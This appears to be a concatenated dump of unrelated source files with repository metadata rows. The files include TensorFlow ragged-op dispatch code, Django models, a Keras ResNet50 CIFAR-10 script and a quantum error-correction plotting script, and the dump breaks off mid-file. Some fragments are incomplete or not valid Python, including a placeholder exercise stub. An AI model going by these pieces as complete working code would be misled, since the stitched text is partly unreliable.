from tensorflow.python.ops.ragged import ragged_gather_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_shape
from tensorflow.python.ops.ragged import ragged_util
from tensorflow.python.ops.ragged import ragged_where_op
from tensorflow.python.util import dispatch
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_export
from tensorflow.python.util import tf_inspect
# @TODO(edloper): Set this to True in the CL that exports RaggedTensors.
_UPDATE_DOCSTRINGS = False
# Information about an argument to an operation: The name of the argument, its
# position in the argument list, and a boolean flag indicating whether it
# expects a list of tensors.
_ArgInfo = collections.namedtuple('ArgInfo', ['name', 'position', 'is_list'])
def _get_arg_infos(func, arg_names):
"""Returns an `_ArgInfo` for each argument of `func` specified by `arg_names`.
Args:
func: The function whose arguments should be described.
arg_names: The names of the arguments to get info for.
Returns:
A tuple of `_ArgInfo`s.
"""
arg_infos = []
# Inspect the func's argspec to find the position of each arg.
arg_spec = tf_inspect.getargspec(func)
for argname in arg_names:
assert isinstance(argname, str)
is_list = argname.startswith('[') and argname.endswith(']')
if is_list:
argname = argname[1:-1]
if argname not in arg_spec.args:
raise ValueError('Argument %r not found function in %s. Args=%s' %
(argname, func, arg_spec.args))
arg_infos.append(_ArgInfo(argname, arg_spec.args.index(argname), is_list))
return arg_infos
def _is_convertible_to_tensor(value):
"""Returns true if `value` is convertible to a `Tensor`."""
if value is None:
return True
if isinstance(value,
(ops.Tensor, variables.Variable, np.ndarray, int, float, str)):
return True
elif isinstance(value, (sparse_tensor.SparseTensor,)):
return False
else:
try:
ops.convert_to_tensor(value)
return True
except (TypeError, ValueError):
return False
class UnaryRaggedElementwiseDispatcher(dispatch.OpDispatcher):
"""OpDispatcher for unary ops that map a base op across ragged values."""
def __init__(self, original_op, arg_is_list=False):
self._original_op = original_op
self._arg_is_list = arg_is_list
arg_names = tf_inspect.getfullargspec(original_op)[0]
self._x = arg_names[0]
if _UPDATE_DOCSTRINGS:
original_op.__doc__ = (
original_op.__doc__.rstrip() + '\n\n' +
' `{x}` may be a `tf.RaggedTensor`.\n'.format(x=self._x))
def handle(self, args, kwargs):
if args:
x, args = args[0], args[1:]
else:
kwargs = kwargs.copy()
x = kwargs.pop(self._x, None)
if x is None:
return self.NOT_SUPPORTED
if self._arg_is_list:
found_ragged = False
for elt in x:
if ragged_tensor.is_ragged(elt):
found_ragged = True
elif not _is_convertible_to_tensor(elt):
return self.NOT_SUPPORTED
if found_ragged:
nested_splits_lists = [
elt.nested_row_splits for elt in x if ragged_tensor.is_ragged(elt)
]
flat_values = [
elt.flat_values if ragged_tensor.is_ragged(elt) else elt
for elt in x
]
with ops.control_dependencies(
ragged_util.assert_splits_match(nested_splits_lists)):
return ragged_tensor.RaggedTensor.from_nested_row_splits(
self._original_op(flat_values, *args, **kwargs),
nested_splits_lists[0])
else:
return self.NOT_SUPPORTED
else:
found_ragged = ragged_tensor.is_ragged(x)
if found_ragged:
mapped_values = self._original_op(x.flat_values, *args, **kwargs)
return x.with_flat_values(mapped_values)
else:
return self.NOT_SUPPORTED
class BinaryRaggedElementwiseDispatcher(dispatch.OpDispatcher):
"""OpDispatcher for binary ops that map a base op across ragged values.
Supports broadcasting.
"""
def __init__(self, original_op):
self._original_op = original_op
arg_names = tf_inspect.getfullargspec(original_op)[0]
self._x = arg_names[0]
self._y = arg_names[1]
if _UPDATE_DOCSTRINGS:
original_op.__doc__ = (
original_op.__doc__.rstrip() + '\n\n' +
' `{x}` and `{y}` may be a `tf.RaggedTensor`.\n'.format(
x=self._x, y=self._y))
def handle(self, args, kwargs):
# Extract the binary args.
if len(args) > 1:
x = args[0]
y = args[1]
args = args[2:]
elif args:
kwargs = kwargs.copy()
x = args[0]
y = kwargs.pop(self._y, None)
args = args[1:]
else:
kwargs = kwargs.copy()
x = kwargs.pop(self._x, None)
y = kwargs.pop(self._y, None)
# Bail if we don't have at least one ragged argument.
x_is_ragged = ragged_tensor.is_ragged(x)
y_is_ragged = ragged_tensor.is_ragged(y)
if not (x_is_ragged or y_is_ragged):
return self.NOT_SUPPORTED
# Convert args to tensors. Bail if conversion fails.
try:
if not x_is_ragged:
x = ops.convert_to_tensor(x, name=self._x, preferred_dtype=y.dtype)
if not y_is_ragged:
y = ops.convert_to_tensor(y, name=self._y, preferred_dtype=x.dtype)
except (TypeError, ValueError):
return self.NOT_SUPPORTED
if ((x_is_ragged and y_is_ragged) or
(x_is_ragged and x.flat_values.shape.ndims <= y.shape.ndims) or
(y_is_ragged and y.flat_values.shape.ndims <= x.shape.ndims)):
bcast_shape = ragged_tensor_shape.broadcast_dynamic_shape(
ragged_tensor_shape.RaggedTensorDynamicShape.from_tensor(x),
ragged_tensor_shape.RaggedTensorDynamicShape.from_tensor(y))
x = ragged_tensor_shape.broadcast_to(
x, bcast_shape, broadcast_inner_dimensions=False)
y = ragged_tensor_shape.broadcast_to(
y, bcast_shape, broadcast_inner_dimensions=False)
x_values = x.flat_values if ragged_tensor.is_ragged(x) else x
y_values = y.flat_values if ragged_tensor.is_ragged(y) else y
mapped_values = self._original_op(x_values, y_values, *args, **kwargs)
if ragged_tensor.is_ragged(x):
return x.with_flat_values(mapped_values)
else:
return y.with_flat_values(mapped_values)
class RaggedDispatcher(dispatch.OpDispatcher):
"""OpDispatcher for ragged ops.
Dispatches to a wrapped op-handler if at least one of the `tensor_args`
arguments is a RaggedTensor or a RaggedTensorValue; and all of the
`tensor_args` arguments are convertible to Tensor or RaggedTensor.
"""
def __init__(self, original_op, ragged_op, ragged_args):
op_arg_names = tf_inspect.getfullargspec(original_op)[0]
ragged_arg_names = tf_inspect.getfullargspec(ragged_op)[0]
if op_arg_names != ragged_arg_names:
raise AssertionError(
'Signature must exactly match when overriding %s with %s: %s vs %s' %
(original_op, ragged_op, op_arg_names, ragged_arg_names))
self._ragged_op = ragged_op
self._ragged_args = _get_arg_infos(ragged_op, ragged_args)
if _UPDATE_DOCSTRINGS:
arg_list = ' and '.join('`%s`' % arg for arg in ragged_args)
original_op.__doc__ = (
original_op.__doc__.rstrip() + '\n\n' +
' {0} may be a `tf.RaggedTensor`.\n'.format(arg_list))
def handle(self, args, kwargs):
if self.is_supported(args, kwargs):
return self._ragged_op(*args, **kwargs)
else:
return self.NOT_SUPPORTED
def is_supported(self, args, kwargs):
found_ragged = False
for arg_info in self._ragged_args:
if arg_info.position < len(args):
arg = args[arg_info.position]
else:
arg = kwargs.get(arg_info.name, None)
if arg_info.is_list:
if not isinstance(arg, (list, tuple)):
return False
for elt in arg:
if ragged_tensor.is_ragged(elt):
found_ragged = True
elif not _is_convertible_to_tensor(elt):
return False
else:
if ragged_tensor.is_ragged(arg):
found_ragged = True
elif not _is_convertible_to_tensor(arg):
return False
return found_ragged
def ragged_dispatch(original_op, tensor_args):
def decorator(ragged_op):
dispatch.RaggedDispatcher(original_op, ragged_op,
tensor_args).register(original_op)
return ragged_op
return decorator
_UNARY_ELEMENTWISE_OPS = [
array_ops.check_numerics,
array_ops.identity,
array_ops.ones_like,
array_ops.ones_like_v2,
array_ops.zeros_like,
array_ops.zeros_like_v2,
clip_ops.clip_by_value,
gen_bitwise_ops.invert,
math_ops.abs,
math_ops.acos,
math_ops.acosh,
math_ops.angle,
math_ops.asin,
math_ops.asinh,
math_ops.atan,
math_ops.atanh,
math_ops.cast,
math_ops.ceil,
math_ops.conj,
math_ops.cos,
math_ops.cosh,
math_ops.digamma,
math_ops.erf,
math_ops.erfc,
math_ops.exp,
math_ops.expm1,
math_ops.floor,
math_ops.imag,
math_ops.is_finite,
math_ops.is_inf,
math_ops.is_nan,
math_ops.lgamma,
math_ops.log,
math_ops.log1p,
math_ops.log_sigmoid,
math_ops.logical_not,
math_ops.negative,
math_ops.real,
math_ops.reciprocal,
math_ops.rint,
math_ops.round,
math_ops.rsqrt,
math_ops.saturate_cast,
math_ops.sign,
math_ops.sin,
math_ops.sinh,
math_ops.sqrt,
math_ops.square,
math_ops.tan,
parsing_ops.decode_compressed,
string_ops.string_to_number,
string_ops.string_to_hash_bucket,
string_ops.as_string,
string_ops.decode_base64,
string_ops.encode_base64,
string_ops.regex_full_match,
string_ops.regex_replace,
string_ops.string_strip,
string_ops.string_to_hash_bucket,
string_ops.string_to_hash_bucket_fast,
string_ops.string_to_hash_bucket_strong,
string_ops.substr,
string_ops.substr_v2,
string_ops.string_length,
string_ops.string_length_v2,
string_ops.unicode_script,
]
_UNARY_LIST_ELEMENTWISE_OPS = [
math_ops.add_n,
string_ops.string_join,
]
_BINARY_ELEMENTWISE_OPS = [
gen_bitwise_ops.bitwise_and,
gen_bitwise_ops.bitwise_or,
gen_bitwise_ops.bitwise_xor,
gen_bitwise_ops.left_shift,
gen_bitwise_ops.right_shift,
math_ops.add,
math_ops.atan2,
math_ops.complex,
math_ops.div_no_nan,
math_ops.divide,
math_ops.equal,
math_ops.floordiv,
math_ops.floormod,
math_ops.greater,
math_ops.greater_equal,
math_ops.less,
math_ops.less_equal,
math_ops.logical_and,
math_ops.logical_or,
math_ops.logical_xor,
math_ops.maximum,
math_ops.minimum,
math_ops.multiply,
math_ops.not_equal,
math_ops.pow,
math_ops.realdiv,
math_ops.squared_difference,
math_ops.subtract,
math_ops.truediv,
math_ops.truncatediv,
math_ops.truncatemod,
]
# We don't need to register a separate delegation handler for these v1 ops,
# since they delegate to the v2 ops (which already have a handler). But we
# still want to include them in the ragged_op_list() output.
_V1_OPS_THAT_DELEGATE_TO_V2_OPS = [
math_ops.reduce_sum,
math_ops.reduce_prod,
math_ops.reduce_min,
math_ops.reduce_max,
math_ops.reduce_mean,
math_ops.reduce_any,
math_ops.reduce_all,
]
def _ragged_gather_v1(params, indices, validate_indices=None, name=None,
axis=0, batch_dims=0):
return ragged_gather_ops.gather(
params=params,
indices=indices,
validate_indices=validate_indices,
axis=axis,
batch_dims=batch_dims,
name=name)
def _ragged_gather_nd_v1(params, indices, name=None, batch_dims=0):
return ragged_gather_ops.gather_nd(
params=params,
indices=indices,
batch_dims=batch_dims,
name=name)
def _ragged_expand_dims_v1(input, axis=None, name=None, dim=None): # pylint: disable=redefined-builtin
if dim is not None:
axis = dim
return ragged_array_ops.expand_dims(input=input, axis=axis, name=name)
def _ragged_size_v1(input, name=None, out_type=dtypes.int32): # pylint: disable=redefined-builtin
return ragged_array_ops.size(input=input, out_type=out_type, name=name)
# (original_op, ragged_op, ragged_args)
_RAGGED_DISPATCH_OPS = [
(array_ops.batch_gather, ragged_batch_gather_ops.batch_gather,
['params', 'indices']),
(array_ops.concat, ragged_concat_ops.concat, ['[values]']),
(array_ops.expand_dims, _ragged_expand_dims_v1, ['input']),
(array_ops.expand_dims_v2, ragged_array_ops.expand_dims, ['input']),
(array_ops.gather, _ragged_gather_v1, ['params', 'indices']),
(array_ops.gather_v2, ragged_gather_ops.gather, ['params', 'indices']),
(array_ops.gather_nd, _ragged_gather_nd_v1, ['params', 'indices']),
(array_ops.gather_nd_v2, ragged_gather_ops.gather_nd,
['params', 'indices']),
(array_ops.rank, ragged_array_ops.rank, ['input']),
(array_ops.size, _ragged_size_v1, ['input']),
(array_ops.size_v2, ragged_array_ops.size, ['input']),
(array_ops.stack, ragged_concat_ops.stack, ['[values]']),
(array_ops.tile, ragged_array_ops.tile, ['input']),
(array_ops.where, ragged_where_op.where, ['condition', 'x', 'y']),
(math_ops.unsorted_segment_sum, ragged_math_ops.segment_sum,
['data', 'segment_ids']),
(math_ops.unsorted_segment_prod, ragged_math_ops.segment_prod,
['data', 'segment_ids']),
(math_ops.unsorted_segment_min, ragged_math_ops.segment_min,
['data', 'segment_ids']),
(math_ops.unsorted_segment_max, ragged_math_ops.segment_max,
['data', 'segment_ids']),
(math_ops.unsorted_segment_mean, ragged_math_ops.segment_mean,
['data', 'segment_ids']),
(math_ops.unsorted_segment_sqrt_n, ragged_math_ops.segment_sqrt_n,
['data', 'segment_ids']),
(math_ops.reduce_sum, ragged_math_ops.reduce_sum, ['input_tensor']),
(math_ops.reduce_prod, ragged_math_ops.reduce_prod, ['input_tensor']),
(math_ops.reduce_min, ragged_math_ops.reduce_min, ['input_tensor']),
(math_ops.reduce_max, ragged_math_ops.reduce_max, ['input_tensor']),
(math_ops.reduce_mean, ragged_math_ops.reduce_mean, ['input_tensor']),
(math_ops.reduce_any, ragged_math_ops.reduce_any, ['input_tensor']),
(math_ops.reduce_all, ragged_math_ops.reduce_all, ['input_tensor']),
]
def register_dispatchers():
"""Constructs & registers OpDispatchers for ragged ops."""
op_list = (
_UNARY_ELEMENTWISE_OPS + _UNARY_LIST_ELEMENTWISE_OPS +
_BINARY_ELEMENTWISE_OPS + [x[0] for x in _RAGGED_DISPATCH_OPS])
for op in op_list:
_, undecorated_op = tf_decorator.unwrap(op)
if not hasattr(undecorated_op,
tf_export.API_ATTRS[tf_export.TENSORFLOW_API_NAME].names):
raise AssertionError('Expected %s to be an exported symbol '
'(while adding a RaggedTensor dispatcher)')
for op in _UNARY_ELEMENTWISE_OPS:
UnaryRaggedElementwiseDispatcher(op).register(op)
for op in _UNARY_LIST_ELEMENTWISE_OPS:
UnaryRaggedElementwiseDispatcher(op, True).register(op)
for op in _BINARY_ELEMENTWISE_OPS:
BinaryRaggedElementwiseDispatcher(op).register(op)
for (original_op, ragged_op, args) in _RAGGED_DISPATCH_OPS:
RaggedDispatcher(original_op, ragged_op, args).register(original_op)
def _ragged_op_signature(op, ragged_args):
"""Returns a signature for the given op, marking ragged args in bold."""
op_name = tf_export.get_canonical_name_for_symbol(op)
argspec = tf_inspect.getfullargspec(op)
arg_names = argspec.args
# Mark ragged arguments in bold.
for pos in ragged_args:
arg_names[pos] = '**' + arg_names[pos] + '**'
# Add argument defaults.
for pos in range(-1, -len(argspec.defaults) - 1, -1):
arg_names[pos] += '=`{!r}`'.format(argspec.defaults[pos])
# Add varargs and keyword args
if argspec.varargs:
arg_names.append('*' + argspec.varargs)
if argspec.varkw:
arg_names.append('**' + argspec.varkw)
return '* `tf.{}`({})'.format(op_name, ', '.join(arg_names))
def _op_is_in_tf_version(op, version):
if version == 1:
return (tf_export.get_v1_names(tf_decorator.unwrap(op)[1]) or
op in _V1_OPS_THAT_DELEGATE_TO_V2_OPS)
elif version == 2:
return tf_export.get_v2_names(tf_decorator.unwrap(op)[1])
else:
raise ValueError('Expected version 1 or 2.')
def ragged_op_list(tf_version=1):
"""Returns a string listing operators that have dispathers registered."""
lines = []
for op in _UNARY_ELEMENTWISE_OPS + _UNARY_LIST_ELEMENTWISE_OPS:
if _op_is_in_tf_version(op, tf_version):
lines.append(_ragged_op_signature(op, [0]))
for op in _BINARY_ELEMENTWISE_OPS:
if _op_is_in_tf_version(op, tf_version):
lines.append(_ragged_op_signature(op, [0, 1]))
for op, _, ragged_args in _RAGGED_DISPATCH_OPS:
if _op_is_in_tf_version(op, tf_version):
arginfos = _get_arg_infos(op, ragged_args)
ragged_args = [arginfo.position for arginfo in arginfos]
lines.append(_ragged_op_signature(op, ragged_args))
return ('\n\n### Additional ops that support `RaggedTensor`\n\n'
'Arguments that accept `RaggedTensor`s are marked in **bold**.\n\n' +
'\n'.join(sorted(lines)) + 'n')
register_dispatchers()
| [
"[email protected]"
] | |
e8fc72f8896f37d77f9f9932b028f806a12925f8 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/.spack/py-flake8/repos/builtin/packages/diffutils/package.py | 8952c702f24bcbe8abf0601da117fd30156000b2 | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-flake8-3.7.8-7lq4x5astf5jpy2hbaxfomootatxdraz/.spack/repos/builtin/packages/diffutils/package.py | [
"[email protected]"
] | |
c008e0806beaccc4d9526eb954576c58d6c04a90 | 98f078b52352ab08a8c9ac08a631a7ff1ac3fa63 | /medeina/medeina/models.py | 7e1e6b0c4f8958eb78d39da777536283f8675ab5 | [] | no_license | Eimis/medeina | 160ceed5044cec5640f272190d2a14d4428f01dc | 3bd838798481f933d729f6104c8b1af29a6f587d | refs/heads/master | 2020-03-08T11:14:11.198773 | 2018-04-08T14:23:29 | 2018-04-08T14:23:29 | 128,092,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from medeina.managers import IssueManager
from medeina.states import IssueStates
from django_states.fields import StateField
@python_2_unicode_compatible
class IssueCategory(models.Model):
name = models.CharField(max_length=20, unique=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Issue categories'
@python_2_unicode_compatible
class Issue(models.Model):
objects = IssueManager()
solved = models.BooleanField(default=False)
title = models.CharField(max_length=50)
submitter = models.ForeignKey(User, related_name='submitted_issues')
solver = models.ForeignKey(User, related_name='solved_issues', null=True)
text_description = models.TextField()
state = StateField(machine=IssueStates)
category = models.ForeignKey(IssueCategory)
created_on = models.DateTimeField(auto_now_add=True)
solved_on = models.DateTimeField(null=True)
def __str__(self):
return self.title
| [
"[email protected]"
] | |
20a2fc1f128171cfd7482a92a45a05bfee5e5344 | f37fc031e3148597efaa7698320e2dff2c230aa7 | /venv/Scripts/pip-script.py | 33dd77e099dea2e08ab6c056fa2839aa3adc0dcf | [] | no_license | XiaoZzi/Crawl | 74a4045299ee698acb75ba43cd3f378220bd763d | 3201e2d5a1b41c0023a60c09aee2ed99d1ce6115 | refs/heads/master | 2020-03-24T18:40:09.643550 | 2018-07-30T15:06:56 | 2018-07-30T15:07:59 | 142,892,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | #!F:\Crawl\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
b532663dbe99cf46e6de9766168e7521419f9b32 | c59194e1908bac7fc0dd4d80bef49c6afd9f91fb | /CodeSignal/Python/SlitheringInStrings/ConvertTabs.py | 5e77e7af1f1acf2c9b3f435b15c1daae37a49f38 | [] | no_license | Bharadwaja92/CompetitiveCoding | 26e9ae81f5b62f4992ce8171b2a46597353f0c82 | d0505f28fd6e93b2f4ef23ad02c671777a3caeda | refs/heads/master | 2023-01-23T03:47:54.075433 | 2023-01-19T12:28:07 | 2023-01-19T12:28:07 | 208,804,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | """
You found an awesome customizable Python IDE that has almost everything you'd like to see in your working environment.
However, after a couple days of coding you discover that there is one important feature that this IDE lacks:
it cannot convert tabs to spaces. Luckily, the IDE is easily customizable, so you decide to write a plugin that would
convert all tabs in the code into the given number of whitespace characters.
Implement a function that, given a piece of code and a positive integer x will turn each tabulation character in code
into x whitespace characters.
Example
For code = "\treturn False" and x = 4, the output should be
convertTabs(code, x) = " return False".
"""
def convertTabs(code, x):
return code.replace('\t', ' '*x)
code = "\treturn False"
x = 4
print(convertTabs(code, x)) | [
"[email protected]"
] | |
1dad86a2398f0ba35ec7eae771277fb34b70e513 | 196d32dbe3d212974f90fec3fcf58ffbaf6fe654 | /reward/utils/batch.py | 34808a77074f4e623ee0de6058d2c4a6c213cd5f | [
"MIT"
] | permissive | lgvaz/reward | a4f1f418f39102225d7ee00a70fed33f1137051a | cfff8acaf70d1fec72169162b95ab5ad3547d17a | refs/heads/master | 2021-10-10T08:16:29.151557 | 2019-01-08T10:08:57 | 2019-01-08T10:08:57 | 115,865,905 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | import numpy as np
import torch
from torch.utils.data import DataLoader, TensorDataset
from reward.utils.memories import SimpleMemory
from reward.utils import to_tensor, join_first_dims, to_np
from reward.utils.device import get
class Batch(SimpleMemory):
def __len__(self):
return len(self["s"])
def apply_to_all(self, func): return Batch((k, func(v)) for k, v in self.items())
def apply_to_keys(self, func, keys): return Batch((k, func(self[k])) for k in keys)
def concat_batch(self):
func = (
lambda x: join_first_dims(x, num_dims=2)
if (isinstance(x, (np.ndarray, torch.Tensor)))
else x
)
return self.apply_to_all(func)
def to_tensor(self, ignore=["idx"]):
return Batch({k: v if k in ignore else to_tensor(v) for k, v in self.items()})
| [
"[email protected]"
] | |
6221e6442f60ee124158b3eabf124eddb05dd89f | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/100_Interactive_Python_Exercises_to_Boost_Your_Python_Skill/Section 4 Data Structures and Algorithms/Coding Exercise 26 Every Seven.py | 9ed14197470bf07a70e6f73daeff5fd0cbe90d89 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 31 | py | # ___ foo mylist
# r_ ? ||? | [
"[email protected]"
] | |
adc0b9f134e3152c574524e73f31f45144d81956 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_savours.py | a906acbbfc694c29d8980efe7376d9c99028bb49 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.verbs._savour import _SAVOUR
#calss header
class _SAVOURS(_SAVOUR, ):
def __init__(self,):
_SAVOUR.__init__(self)
self.name = "SAVOURS"
self.specie = 'verbs'
self.basic = "savour"
self.jsondata = {}
| [
"[email protected]"
] | |
008c3ed1df59cba2c6bce0b737ac840ef68508c2 | c7f43c4cc0ee84a5fe246b67f51e30b8d726ebd5 | /keras2/keras78_03_cifar10_ResNet50.py | 3b90c7a4949262c3b1014362398e7aae04f63536 | [] | no_license | 89Mansions/AI_STUDY | d9f8bdf206f14ba41845a082e731ea844d3d9007 | d87c93355c949c462f96e85e8d0e186b0ce49c76 | refs/heads/master | 2023-07-21T19:11:23.539693 | 2021-08-30T08:18:59 | 2021-08-30T08:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # ResNet50
from tensorflow.keras.applications import ResNet50
from tensorflow.keras.datasets import cifar10
import numpy as np
import pandas as pd
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.applications.vgg16 import preprocess_input
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.models import Sequential
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
#1. DATA
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], x_train.shape[3])/255.
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], x_test.shape[3])/255.
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
print(x_train.shape, y_train.shape)
print(x_test.shape, y_test.shape)
# (50000, 32, 32, 3) (50000, 10)
# (10000, 32, 32, 3) (10000, 10)
#2. Modeling
rn50 = ResNet50(weights='imagenet', include_top=False, input_shape=(32,32,3))
rn50.trainable = False
model = Sequential()
model.add(rn50)
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(10, activation='softmax'))
# model.summary()
#3. Compile, Train
lr = ReduceLROnPlateau(monitor='val_loss', factor=0.4, patience=10, verbose=1, mode='min')
es = EarlyStopping(monitor='val_loss', patience=20, mode='min')
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.fit(x_train, y_train, epochs=100, batch_size=32, validation_split=0.2, verbose=1, callbacks=[lr, es])
loss, acc = model.evaluate(x_test, y_test, batch_size=32)
print("loss : ", loss)
print("acc : ", acc)
## CNN
# loss : 1.7849451303482056
# acc : 0.5971999764442444
###### 전이학습 ######
# VGG16
# loss : 1.9435967206954956
# acc : 0.604200005531311
# VGG19
# loss : 1.9104373455047607
# acc : 0.5917999744415283
# Xception
# ValueError: Input size must be at least 71x71; got `input_shape=(32, 32, 3)`
# >> UpSampling2D & input_shape = (96, 96,3)으로 바꿔줌
# loss : 2.4691503047943115
# acc : 0.7441999912261963
# ResNet50
# loss : 2.302600860595703
# acc : 0.10000000149011612 | [
"[email protected]"
] | |
47cf1a099f9594ba41114c905f4b027f41b1fb7a | 930a868ae9bbf85df151b3f54d04df3a56bcb840 | /benchmark/paper_weighted_union_find_on_XZZX/debug_code_capacity_noise_model/plot_weight_change/weight_change_neighbor.py | 2eb2c091cdab7939f2048f5ca5ca59293dfc50aa | [
"MIT"
] | permissive | yuewuo/QEC-Playground | 1148f3c5f4035c069986d8b4103acf7f1e34f9d4 | 462208458cdf9dc8a33d4553a560f8a16c00e559 | refs/heads/main | 2023-08-10T13:05:36.617858 | 2023-07-22T23:48:49 | 2023-07-22T23:48:49 | 312,809,760 | 16 | 1 | MIT | 2023-07-22T23:48:51 | 2020-11-14T12:10:38 | Python | UTF-8 | Python | false | false | 3,171 | py | import os, sys
import subprocess, sys
qec_playground_root_dir = subprocess.run("git rev-parse --show-toplevel", cwd=os.path.dirname(os.path.abspath(__file__)), shell=True, check=True, capture_output=True).stdout.decode(sys.stdout.encoding).strip(" \r\n")
rust_dir = os.path.join(qec_playground_root_dir, "backend", "rust")
fault_toleran_MWPM_dir = os.path.join(qec_playground_root_dir, "benchmark", "fault_tolerant_MWPM")
sys.path.insert(0, fault_toleran_MWPM_dir)
from automated_threshold_evaluation import qec_playground_fault_tolerant_MWPM_simulator_runner_vec_command
from automated_threshold_evaluation import run_qec_playground_command_get_stdout, compile_code_if_necessary
import numpy as np
import matplotlib.pyplot as plt
di = 11
p = 0.07
divide = 10
bias_eta_vec = [str(0.5 * (10 ** (i / divide))) for i in range(4 * divide)]
# print(bias_eta_vec)
parameters = f"-p1 --time_budget 3600 --use_xzzx_code --shallow_error_on_bottom --debug_print_only --debug_print_direct_connections".split(" ")
# only plot one node because otherwise it's too mesy
interested_node = "[12][10][9]" # in the middle
# interested_node = "[12][20][19]" # on the boundary
results = []
for bias_eta in bias_eta_vec:
command = qec_playground_fault_tolerant_MWPM_simulator_runner_vec_command([p], [di], [di], [0], parameters + ["--bias_eta", f"{bias_eta}"])
# run experiment
stdout, returncode = run_qec_playground_command_get_stdout(command, use_tmp_out=True)
# print("\n" + stdout)
assert returncode == 0, "command fails..."
boundary = None
edges = []
is_interested = False
for line in stdout.strip(" \r\n").split("\n"):
if line[0] == "[":
addr = line.split(":")[0]
is_interested = (addr == interested_node)
elif is_interested:
head, value = line.split(": ")
if head == "boundary":
if value[:4] == "p = ":
boundary = float(value[4:])
if head[:5] == "edge ":
assert value[:4] == "p = "
t,i,j = [int(e) for e in head[5:][1:-1].split("][")]
edges.append(((t,i,j), float(value[4:])))
results.append((boundary, edges))
print(bias_eta, boundary, edges)
fig = plt.figure(f"weight change")
fig.clear()
ax0 = fig.add_subplot(111)
plt.xscale("log")
plt.yscale("log")
ax0.set_title(f"direct neighbors of {interested_node}")
ax0.set_xlabel("bias eta")
ax0.set_xticks([0.5, 5, 50, 500, 5000])
ax0.set_xticklabels([0.5, 5, 50, 500, 5000])
ax0.set_ylabel("probability")
float_bias_eta_vec = [float(e) for e in bias_eta_vec]
if results[0][0] is not None:
boundaries = [results[i][0] for i in range(len(results))]
ax0.plot(float_bias_eta_vec, boundaries, label="boundary")
for ni in range(len(results[0][1])):
addr = results[0][1][ni][0]
for i in range(len(results)):
if addr != results[i][1][ni][0]:
print(addr, results[i][1][ni][0])
assert addr == results[i][1][ni][0]
values = [results[i][1][ni][1] for i in range(len(results))]
ax0.plot(float_bias_eta_vec, values, label=f"[{addr[0]}][{addr[1]}][{addr[2]}]")
ax0.legend()
plt.show()
| [
"[email protected]"
] | |
c023c176ead2dccd07efeef6792dfdb196aae49c | 0eb6c70503c680ebec415016ff1b0cfac92486ca | /lincdm/blog/managers.py | 4467fa3b95367eb9e9040e51170ef10107db77b1 | [] | no_license | alexliyu/lincdm | c8b473946f59aca9145b3291890635474f144583 | eab93285f0b03217ea041a7910edae7e00095cd8 | refs/heads/master | 2020-12-30T10:50:05.248988 | 2011-08-09T15:52:38 | 2011-08-09T15:52:38 | 1,464,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,684 | py | """Managers of blog"""
from datetime import datetime
from django.db import models
from django.contrib.sites.models import Site
DRAFT = 0
HIDDEN = 1
PUBLISHED = 2
def tags_published():
"""Return the published tags"""
from tagging.models import Tag
from lincdm.blog.models import Entry
tags_entry_published = Tag.objects.usage_for_queryset(
Entry.published.all())
# Need to do that until the issue #44 of django-tagging is fixed
return Tag.objects.filter(name__in=[t.name for t in tags_entry_published])
class AuthorPublishedManager(models.Manager):
"""Manager to retrieve published authors"""
def get_query_set(self):
"""Return published authors"""
now = datetime.now()
return super(AuthorPublishedManager, self).get_query_set().filter(
